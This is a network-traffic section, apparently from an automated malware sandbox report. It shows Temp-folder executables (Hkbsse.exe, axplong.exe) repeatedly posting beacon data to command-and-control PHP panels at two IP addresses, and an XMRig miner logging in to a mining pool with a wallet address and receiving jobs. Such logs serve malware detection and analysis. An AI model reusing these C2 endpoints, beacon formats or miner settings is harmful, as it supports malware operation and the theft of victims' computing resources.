Jun 27, 2024 06:00:00.745332956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.7	49881	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:00.676975012 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:01.325364113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:01.329993963 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:01.527606010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.7	49882	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:00.961368084 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:01.645093918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:01.650293112 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:01.887582064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.7	49883	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:01.657432079 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:02.302037001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:02.304394960 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:02.494810104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	49884	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:02.108063936 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:02.812721014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:02.861808062 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:03.089416981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	49885	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:02.622055054 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:03.264552116 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:03.267205954 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:03.461051941 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.7	49886	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:03.205245018 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:03.882251978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:03.892179012 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:04.106950045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.7	49887	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:03.579123020 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:04.209197044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:04.219049931 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:04.409674883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.7	49888	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:04.236201048 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:04.971996069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.7	49890	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:04.532341003 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:05.224558115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:05.289724112 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:05.487278938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.7	49891	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:05.042052031 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:05.745174885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.7	49892	95.179.241.203	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:05.559694052 CEST	590	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 76 72 41 68 37 6e 76 41 4b 43 41 75 69 65 74 72 77 69 6a 73 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46vrAh7nvAKCAuietrwijs6Z6a6sLtzeCBbqgrMHG2ssJzmWHWLKok6UkMxbUPxsfuQA1qxQhBBBygy1Bd8vj6NzQMWeh3Q","pass":"","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022",
Jun 27, 2024 06:00:06.199970007 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 32 31 61 61 32 38 37 35 2d 39 35 63 39 2d 34 64 39 34 2d 62 63 32 63 2d 37 34 32 62 31 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"21aa2875-95c9-4d94-bc2c-742b17eefc08","job":{"blob":"1010bec7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000a542e242e48d1387760eaa25337bf9b15fe3b60857adf6acf10
Jun 27, 2024 06:00:18.790321112 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 32 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d2c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000bbe225b87b763c4f53a2b4ddba9b8c4a78e7f50729e720295b3c81ce3cf0530b07","job_id":"799700d5-cc36-4498-b63c-85944
Jun 27, 2024 06:00:18.790407896 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 32 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d2c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000bbe225b87b763c4f53a2b4ddba9b8c4a78e7f50729e720295b3c81ce3cf0530b07","job_id":"799700d5-cc36-4498-b63c-85944
Jun 27, 2024 06:00:18.790441990 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 32 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d2c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000bbe225b87b763c4f53a2b4ddba9b8c4a78e7f50729e720295b3c81ce3cf0530b07","job_id":"799700d5-cc36-4498-b63c-85944
Jun 27, 2024 06:00:40.341372967 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 38 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e8c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef000000004b907c4b22d39afd16463a391e628e70b572e957854389ae628905cddb25875316","job_id":"21a9b007-bdb9-4f92-b36b-28ada
Jun 27, 2024 06:00:40.570645094 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 38 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e8c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef000000004b907c4b22d39afd16463a391e628e70b572e957854389ae628905cddb25875316","job_id":"21a9b007-bdb9-4f92-b36b-28ada
Jun 27, 2024 06:01:01.094409943 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 38 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e8c7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef0000000032e5c74d4890bd445c292643b18f6e686b1bdab265fa5ee1b3ccb708952ae3f816","job_id":"2aeb798c-f9f6-4ca6-a14b-e1169
Jun 27, 2024 06:01:02.502059937 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 65 63 37 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fec7f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000034d5e0aa8c8bdafffedd7ef68812fd6cb8e6d696c3e01653757a862b79b0ef722","job_id":"d48b844a-f89f-47a6-95a3-ca1cd
Jun 27, 2024 06:01:24.352684975 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 34 63 38 66 33 62 33 30 36 37 33 35 30 31 37 39 33 30 32 32 35 36 35 36 34 62 66 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101094c8f3b3067350179302256564bf74226f16aa4136a208467567a7cf9a1061945f7ad6eaef00000000dd9faee42881b4734c3816b829c45d1faa0ff669859ee30d04b8cf9abbbda99b31","job_id":"4dfcb58b-28df-4173-8ffb-5be56

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
